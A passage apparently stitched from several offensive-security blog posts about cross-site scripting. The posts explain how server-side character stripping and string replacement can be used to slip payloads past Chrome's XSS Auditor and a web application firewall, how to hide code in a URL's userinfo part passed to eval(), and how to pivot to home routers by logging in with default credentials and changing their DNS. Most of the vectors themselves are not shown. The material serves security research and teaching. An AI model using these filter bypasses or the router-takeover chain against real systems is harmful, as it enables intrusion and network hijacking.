More than an year ago, in my private twitter account Brutal Secrets, I shared an interesting way to bypass Google’s Chrome anti-XSS filter called XSS Auditor. We will see now in details, from a blackbox perspective, a logical sequence of assumptions and conclusions that leads to our XSS vector responsible for the bypass.
When reading material on XSS subject we usually see the classical <script>alert(1)</script> as an demonstration of such vulnerability (PoC – Proof of Concept). While very true, it doesn’t go much beyond this, making the novice in this field to look for more in order to deal with real world scenarios.
CMSes (Content Management Systems) are a perfect target for XSS attacks: with their module installation features and the possibility to know all the requests done by a legit administrator of the system previously, it’s pretty easy to mount a CSRF (Cross-Site Request Forgery) attack against him/her.
Some sites offer spell checking as a feature of their search functionality or translation application. While this might be a good idea from an user perspective, it can also be a bad idea for one who is trying to avoid XSS in his/her code.
Some weeks ago, a XSS challenge was launched: the goal was to pop an alert(1) box in latest Google Chrome at that time (version 53). Code was minified (made by just one continuous line) which always brings interesting possibilities to handle input injections. Also, there was a CSP (Content Security Policy) header that didn’t allow external calls.
After a tester or attacker is able to pop an alert box, the next step is to call an external script to do whatever he/she wants to do with the victim. In scenarios where XSS is not possible with “<script src=//HOST>” or similar, we need to build the request to load our remote code.
Since the very first days of the world wide web, these applications are being a great target for hackers minds. New ways to interact with systems via HTTP protocol and technologies gave rise to a whole set of attacks. But until now, some of them remain very special: Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), Structured Query Language injection (SQLi) and Remote Code Execution (RCE).
The most straightforward and reliable way to bypass any protection between a tester/attacker and a target application is to use some filtering practices against these very protections.
For a security reason or not, a developer makes some sort of filtering in his/her own code without realizing it can be used to trick any other device or code that will stand between his own and user of application. In this post we will see this affecting a WAF (Web Application Firewall) and a browser anti-XSS filter, both common mitigation solutions.
By using language native or custom functions, a developer can strip or replace what he/she thinks is a dangerous (or unnecessary) character or string. So let’s first see what happens when an application strips spaces from user input.
Here is a PHP page with reflections of 2 URL parameters, “p” and “q”. The first one, “p”, is just a simple
and then, because this page is not whitelisted in my WAF (Web Application Firewall) settings, we are not able to exploit this flaw in a common situation like we can see below. In fact, this (excellent) security solution from Sucuri, named CloudProxy, can detect the XSS attempt even without the alert(1) part, with just a “<svg onload=” input.
The second parameter, “q”, is there to exemplify the bypass. Here is its PHP code:
echo str_replace(“ ”, “”, $_GET[“q”]);
which replaces any white spaces from input. This is enough to trick CloudProxy and XSS Auditor, Google Chrome’s mitigation solution, at the same time.
By adding “+”, usually parsed as white spaces by applications, in strategic places of vector/payload, both security solutions fail because of stripping of a single character. No WAF can see this as a XSS attack because “<” is not immediately followed by a alphabetic character and Auditor can’t see this as similar enough to what is reflected in source, the way this solution uses to catch XSS attempts.
They stand between what is sent by an attacker and what is really echoed back by application, which is not necessarily the same. Without a minimum match there’s no way to identify it as malicious.
Another way to use application against security measures is by abusing char/string replaces. Here is another page, this time with 4 URL parameters, “p”, “q”, “r” and “s”. This page is white listed in WAF settings, because none of these will be enough to bypass it: the presence of this replaced string (“<script”) in every request triggers WAF blocking. But it will work against Auditor.
echo str_ireplace(“<script”, “”, $_GET[“q”]);
echo str_ireplace(“<script”,“InvalidTag”, $_GET[“r”]);
echo str_ireplace(“<script”,“<InvalidTag”, $_GET[“s”]);
As we can see below, using the “p” parameter, Auditor catches it easily.
With “q” parameter, we can see “<script” being stripped.
So by using it right where it would confuse Auditor (in the middle of “on” of event handler), we can alert it.
In the “r” parameter, the replacing issue is “fixed”. A developer replaces it with a harmless string (like we can see in the wild), that mess with our previous construction.
Nice. Another interesting way to do this, though not universally applicable as the previous one (because it can’t accept special chars), follows.
Using the replaced string as a label, it’s also possible to alert in a very elegant way.
Unfortunately, none of the above replacing tricks can be used with the last parameter, “s”. Auditor seems to flag the input due to presence of “<” character in both request and response.
But, developers beware: this can’t be considered an anti- XSS solution, even if employed against all HTML tags (with a regex, for example). It opens another door to a tester/attacker by using the resulting “<InvalidTag” string with any of the agnostic event handlers to form a new attacking vector.
In the beginning of an URL lies an underlooked place useful to hide things from server logs. It’s the authentication part of the authority section. Check the full URL scheme below.
Differently from the fragment part, where we can use document properties like location.hash to store things that will never be sent to server, the user information will be sent but will not figure in logs for security reasons.
Using an slice of the string returned by window.URL property, starting from char 7 to char 15, we pass to eval() the string we want to execute. For a https enabled website, the right combination would be 8 and 16, respectively.
Although there’s a security warning in Firefox (but not in Chrome), the statement about the domain to visit (brutelogic.com.br) may lead user to a wrong conclusion.
After it, there will be no trace of what really happened in browser address bar.
The same can be done with the location property of document if eval() is not available.
But much more harmful is to use this ability to actually do some kind of authentication. Because the victim of a XSS attack can perform requests to internal IP addresses, it’s possible to pivot to devices accessible only to the victim.
Most SOHO (Small Office / Home Office) routers are usually vulnerable to login attacks over this channel, so all an attacker has to do is to guess the right one in a small list of common default credentials. After, he/she proceeds with a basic CSRF attack to add his own DNS server to router configuration achieving total control over the victim’s network. But latest Firefox (version 48) is smart enough to stop automation and warn the user about it.
The same can’t be said about latest Chrome (version 52). It has no security warning again.
Click here to test your own router (Firefox or Chrome). If after clicking on “click me” your router dashboard appears, you may be in serious trouble.